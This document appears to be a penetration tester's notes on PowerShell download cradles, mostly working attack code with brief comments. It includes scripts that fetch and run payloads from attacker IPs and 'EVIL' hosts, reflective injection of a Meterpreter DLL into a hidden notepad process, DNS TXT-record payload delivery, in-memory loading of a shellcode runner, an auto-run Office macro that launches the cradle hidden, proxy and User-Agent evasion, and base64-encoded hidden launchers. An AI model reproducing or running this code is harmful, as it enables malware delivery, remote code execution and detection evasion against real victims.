PS Download Cradles

Wednesday, April 20, 2022

8:13 PM



Download Cradles

Reflective DLL Injection

# Invoke-ReflectivePEInjection is the PowerSploit cmdlet. The DLL must match the bitness of the host process:
# SysWOW64\notepad.exe is the 32-bit notepad, so met.dll has to be a 32-bit DLL here (use System32\notepad.exe for x64).
$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.205/met.dll')
# -ErrorAction SilentlyContinue: Stop-Process throws when no such process is running
Stop-Process -Name "notepad" -ErrorAction SilentlyContinue
Stop-Process -Name "rundll32" -ErrorAction SilentlyContinue
Start-Process -FilePath "C:\Windows\SysWOW64\notepad.exe" -WindowStyle Hidden
# Select-Object -First 1: Get-Process returns an array when several notepads exist, and -ProcId needs one Id
$processId = (Get-Process -Name "notepad" | Select-Object -First 1).Id
IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.49.205/InvokeReflectivePEInjection.ps1')
Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $processId
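The bitness mismatch above is the usual reason this fails silently, so here is an added check (my code, not part of the original notes or PowerSploit) that reads the Machine field of the downloaded DLL's PE header and picks the matching notepad.exe before injecting. The $bytes used below is a constructed minimal PE header for an offline run; in practice it is the DownloadData() result.

```powershell
# Added example: choose the host process from the DLL's own PE header.
function Get-PEMachine {
    param([byte[]]$Bytes)
    if ($Bytes.Length -lt 0x40 -or $Bytes[0] -ne 0x4D -or $Bytes[1] -ne 0x5A) {
        throw "Not a PE image (missing MZ header)"
    }
    $peOffset = [BitConverter]::ToInt32($Bytes, 0x3C)            # IMAGE_DOS_HEADER.e_lfanew
    if ($peOffset + 6 -gt $Bytes.Length -or
        [BitConverter]::ToUInt32($Bytes, $peOffset) -ne 0x4550) {  # "PE\0\0" little-endian
        throw "Not a PE image (missing PE signature)"
    }
    [BitConverter]::ToUInt16($Bytes, $peOffset + 4)               # IMAGE_FILE_HEADER.Machine
}

function Get-HostProcessPath {
    param([byte[]]$Bytes)
    # From a 64-bit PowerShell these paths are literal; from a 32-bit PowerShell
    # System32 is redirected to SysWOW64, so use $env:windir\sysnative for the x64 host.
    switch (Get-PEMachine $Bytes) {
        0x014C { "$env:windir\SysWOW64\notepad.exe" }   # IMAGE_FILE_MACHINE_I386
        0x8664 { "$env:windir\System32\notepad.exe" }   # IMAGE_FILE_MACHINE_AMD64
        default { throw "Unsupported machine type" }
    }
}

# Constructed 64-bit header (assumption: stands in for the real met.dll bytes):
# MZ ... e_lfanew=0x40, "PE\0\0" at 0x40, Machine=0x8664 at 0x44
$bytes = New-Object byte[] 0x48
$bytes[0] = 0x4D; $bytes[1] = 0x5A
[BitConverter]::GetBytes([int]0x40).CopyTo($bytes, 0x3C)
$bytes[0x40] = 0x50; $bytes[0x41] = 0x45
[BitConverter]::GetBytes([uint16]0x8664).CopyTo($bytes, 0x44)

$hostExe = Get-HostProcessPath $bytes
if ($hostExe -notlike '*\System32\notepad.exe') { throw "bitness selection failed" }

# Spawn a fresh hidden host and take its PID directly instead of grepping Get-Process,
# which returns an array when several notepads are already open.
$proc = Start-Process -FilePath $hostExe -WindowStyle Hidden -PassThru
$processId = $proc.Id
$processId
```

With a real DLL, replace the constructed $bytes with the DownloadData() result and pass $processId to Invoke-ReflectivePEInjection as in the notes above.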

normal download cradle

IEX (New-Object Net.Webclient).downloadstring("http://192.168.49.105/run.txt")

PowerShell 3.0+ (Invoke-WebRequest; on Windows PowerShell add -UseBasicParsing so the call does not depend on the Internet Explorer engine for HTML parsing)

IEX (iwr 'http://EVIL/evil.ps1')

hidden IE COM object (needs Internet Explorer installed; innerHTML is the rendered DOM, so serve plain text and expect <, > and & in the script to come back HTML-entity encoded)

$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

Msxml2.XMLHTTP COM object

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

WinHttp COM object (not proxy aware! it uses the machine WinHTTP proxy from "netsh winhttp show proxy", not the user's IE/WinINet proxy)

$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

using bitstransfer - touches disk and leaves a BITS job record in the Microsoft-Windows-Bits-Client/Operational event log!

Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)

code to execute needs to be a base64 encoded string stored in a TXT record; "SERVER" is the DNS name that holds the record

# Select-String keeps the nslookup output line containing the quoted TXT value, -split '"' isolates it,
# and Convert.FromBase64String ignores the surrounding whitespace
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
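A single TXT string is limited to 255 bytes, so anything beyond a trivial stager has to be split across several strings in one record and re-joined on the client before base64 decoding. The following is my added example (not PowerBreach code and not from the original notes) covering both ends; the record name c2.example.com is an assumption.

```powershell
# Added example: build the TXT record content for a script and decode it back.
function ConvertTo-TxtStrings {
    param([string]$Script, [int]$ChunkSize = 255)
    $b64 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($Script))
    $chunks = @()
    for ($i = 0; $i -lt $b64.Length; $i += $ChunkSize) {
        $len = [Math]::Min($ChunkSize, $b64.Length - $i)
        $chunks += $b64.Substring($i, $len)
    }
    $chunks
}

function ConvertFrom-TxtStrings {
    param([string[]]$Strings)
    # Join the fragments first: decoding each fragment on its own fails
    # whenever a 255-byte split lands inside a base64 quartet.
    $b64 = ($Strings -join '')
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64))
}

# Server side: one RR with several quoted strings (zone-file form).
# The script body below is constructed for the example.
$script = 'Get-Process | Select-Object -First 3 Name, Id'
$strings = ConvertTo-TxtStrings -Script $script
'c2.example.com. IN TXT ' + (($strings | ForEach-Object { '"' + $_ + '"' }) -join ' ')

# Client side on Windows 8 / Server 2012 and later, instead of parsing nslookup text:
#   $strings = (Resolve-DnsName -Name 'c2.example.com' -Type TXT -ErrorAction Stop).Strings
# Offline round trip using the strings built above:
$decoded = ConvertFrom-TxtStrings -Strings $strings
if ($decoded -ne $script) { throw 'TXT round trip failed' }
Invoke-Expression $decoded
```

Resolve-DnsName exposes the record's string array as .Strings, which is exactly what ConvertFrom-TxtStrings expects; the nslookup one-liner above only survives because the test payload fits in one string.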

from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d

<#
<?xml version="1.0"?>
<command>
   <a>
      <execute>Get-Process</execute>
   </a>
  </command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex

Tradecraft

Setting Proxy

$wc = new-object system.net.WebClient
# Proxy must be a WebProxy object; assigning a bare host:port string does not work
$wc.proxy = New-Object System.Net.WebProxy("http://192.168.72.12:3128")
$wc.DownloadString("http://192.168.119.120/run.ps1")

User-Agent

$wc = new-object system.net.WebClient
# WebClient sends no User-Agent header by default; set one that matches the environment's browser traffic
$wc.Headers.Add('User-Agent', "This is my agent, there is no one like it...")
$wc.DownloadString("http://192.168.119.120/run.ps1")

In-memory PS Reflective Load

After building a C# project containing a shellcode runner (a public static method "runner" in class Class1), run the following in PS to load the precompiled assembly into memory from a byte array and invoke the method. The string passed to GetType() must match the compiled namespace and class exactly; otherwise GetType() returns $null and the GetMethod call fails.

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.0.107/ClassLibrary.dll')

$assem = [System.Reflection.Assembly]::Load($data)   # loads from the byte array, nothing is written to disk
$class = $assem.GetType("ClassLibrary.Class1")       # "Namespace.Class" of the build
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)                              # first argument is the instance and is ignored for a static method

One-liner for cmd or a macro (note this one expects the namespace ClassLibrary1, i.e. a different build than the snippet above):

powershell $data = (New-Object System.Net.WebClient).DownloadData('http://192.168.0.107/ClassLibrary.dll');$assem = [System.Reflection.Assembly]::Load($data);$class = $assem.GetType('ClassLibrary1.Class1');$method = $class.GetMethod('runner');$method.Invoke(0, $null)

The same one-liner can be launched from an MS Office macro (here the DLL name and namespace are both ClassLibrary1; keep them consistent with the build):

Sub MyMacro()
Dim str As String
str = "powershell $data = (New-Object System.Net.WebClient).DownloadData('http://192.168.0.107/ClassLibrary1.dll');$assem = [System.Reflection.Assembly]::Load($data);$class = $assem.GetType('ClassLibrary1.Class1');$method = $class.GetMethod('runner');$method.Invoke(0, $null)"
Shell str, vbHide
End Sub
Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub
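To exercise the Load/GetType/GetMethod/Invoke sequence without a C2 server, here is an added example (my code, not from the original notes) that compiles a benign runner on the fly with Add-Type, reads it back as a byte array and loads it the same way. The namespace, class and method names are assumptions matching the one-liner above; the loader checks GetType() for $null and lists the types actually present, which is the mismatch the ClassLibrary vs ClassLibrary1 snippets above would hit.

```powershell
# Added example: Assembly.Load() from bytes with a name check.
# Stands in for the Visual Studio build (Windows PowerShell 5.1 Add-Type).
$src = @'
namespace ClassLibrary1 {
    public class Class1 {
        public static string runner() {
            return "runner executed in PID " + System.Diagnostics.Process.GetCurrentProcess().Id;
        }
    }
}
'@
$dll = Join-Path $env:TEMP 'ClassLibrary1.dll'
Add-Type -TypeDefinition $src -OutputAssembly $dll
$data = [IO.File]::ReadAllBytes($dll)    # stands in for WebClient.DownloadData()
Remove-Item $dll                          # from here on only the byte[] exists

function Invoke-AssemblyMethod {
    param([byte[]]$Bytes, [string]$TypeName, [string]$MethodName)
    $assem = [System.Reflection.Assembly]::Load($Bytes)    # in-memory load, no file on disk
    $type = $assem.GetType($TypeName)
    if ($null -eq $type) {
        $names = ($assem.GetTypes() | ForEach-Object FullName) -join ', '
        throw "Type '$TypeName' not found; assembly contains: $names"
    }
    $method = $type.GetMethod($MethodName)
    if ($null -eq $method) { throw "Method '$MethodName' not found on $TypeName" }
    # Invoke(instance, args): the instance argument is ignored for a static method
    $method.Invoke($null, $null)
}

Invoke-AssemblyMethod -Bytes $data -TypeName 'ClassLibrary1.Class1' -MethodName 'runner'
# Wrong namespace, as in the mixed ClassLibrary/ClassLibrary1 snippets above:
try { Invoke-AssemblyMethod -Bytes $data -TypeName 'ClassLibrary.Class1' -MethodName 'runner' }
catch { Write-Warning $_.Exception.Message }
```

The temporary file exists only to obtain the bytes; the real cradle never writes the DLL, which is the point of Assembly.Load(byte[]) over Assembly.LoadFile().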

Proxy-Aware Download Cradle

New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem 'HKU:\'
# first loaded user hive (S-1-5-21-...); substring(10) strips the "HKEY_USERS" prefix from the key name
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start = $key.Name.substring(10);break}}
$proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
[system.net.webrequest]::DefaultWebProxy = new-object System.Net.WebProxy("http://$proxyAddr")
$wc = new-object system.net.WebClient
$wc.DownloadString("http://192.168.119.120/run2.ps1")

The code above reads the proxy server address and port from the WinINet settings in the first logged-on user's registry hive and routes the download through it. It assumes ProxyServer holds a plain host:port. Windows only honours that value when ProxyEnable is 1, and the value can also be a per-protocol list ("http=host:port;https=host:port"), which this snippet does not parse. When the cradle already runs as the user, HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings gives the same values without the HKU walk.
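Both the proxy/User-Agent snippets under Tradecraft and the registry walk above share the same gaps (ProxyEnable not checked, per-protocol ProxyServer values, authenticating proxies). The following is an added example of my own, not from the original notes, that handles those cases in one helper; the host names, ports and URLs are assumptions.

```powershell
# Added example: proxy-aware WebClient cradle that honours the user's WinINet settings.
function ConvertFrom-ProxyServerValue {
    param([string]$Value)
    if ([string]::IsNullOrEmpty($Value)) { return $null }
    if ($Value -notmatch '=') { return "http://$Value" }          # plain "host:port"
    foreach ($entry in $Value -split ';') {                        # "http=host:port;https=host:port;..."
        $scheme, $hostPort = $entry -split '=', 2
        if ($scheme -eq 'http') { return "http://$hostPort" }
    }
    $null
}

function Get-WinInetProxy {
    # Current user's hive; the HKU:\S-1-5-21-* walk above is only needed from another security context.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
    $s = Get-ItemProperty -Path $key
    if ($s.ProxyEnable -ne 1) { return $null }    # ProxyServer is ignored by Windows unless ProxyEnable=1
    ConvertFrom-ProxyServerValue $s.ProxyServer
}

function Invoke-ProxyAwareCradle {
    param(
        [string]$Url,
        [string]$UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'   # assumed value; match the environment
    )
    $wc = New-Object System.Net.WebClient
    $proxyUrl = Get-WinInetProxy
    if ($proxyUrl) {
        $wc.Proxy = New-Object System.Net.WebProxy($proxyUrl)
    } else {
        # System proxy covers PAC/auto-detect configurations that have no static ProxyServer value
        $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy()
    }
    # Authenticating proxies (NTLM/Kerberos) return 407 without the logged-on user's credentials
    $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
    $wc.Headers.Add('User-Agent', $UserAgent)   # WebClient sends no User-Agent unless told to
    $wc.DownloadString($Url)
}

# Offline checks of the parser against constructed registry values:
if ((ConvertFrom-ProxyServerValue '192.168.72.12:3128') -ne 'http://192.168.72.12:3128') { throw 'plain form' }
if ((ConvertFrom-ProxyServerValue 'http=10.0.0.1:8080;https=10.0.0.1:8443') -ne 'http://10.0.0.1:8080') { throw 'list form' }
if ($null -ne (ConvertFrom-ProxyServerValue '')) { throw 'empty form' }

# Live use (network), assumed URL:
# Invoke-ProxyAwareCradle -Url 'http://192.168.119.120/run2.ps1' | Invoke-Expression
```

Setting Credentials on the proxy rather than on the WebClient matters: WebClient.Credentials authenticates to the web server, Proxy.Credentials to the proxy.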

Check for 32/64-bit

# [IntPtr]::Size is 4 only inside a 32-bit process (e.g. a 32-bit Office host). sysnative is the WOW64 alias for the real
# 64-bit System32, so this relaunches into 64-bit PowerShell; from a 64-bit process the sysnative path does not exist.
if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};

Full Command

The -enc argument is base64 of the UTF-16LE command string (hence the many "A" characters); this one decodes to IEX (New-Object Net.Webclient).downloadstring("http://192.168.49.205/run.txt"). Note that RedirectStandardOutput is set but the output is never read, so a child that writes more than the pipe buffer will block.

if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAOQAuADIAMAA1AC8AcgB1AG4ALgB0AHgAdAAiACkA';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);

Same - edited ps payload (decodes to (New-Object System.Net.WebClient).DownloadString('http://192.168.49.105/run.txt') | IEX).

if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAOQAuADEAMAA1AC8AcgB1AG4ALgB0AHgAdAAnACkAIAB8ACAASQBFAFgA';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);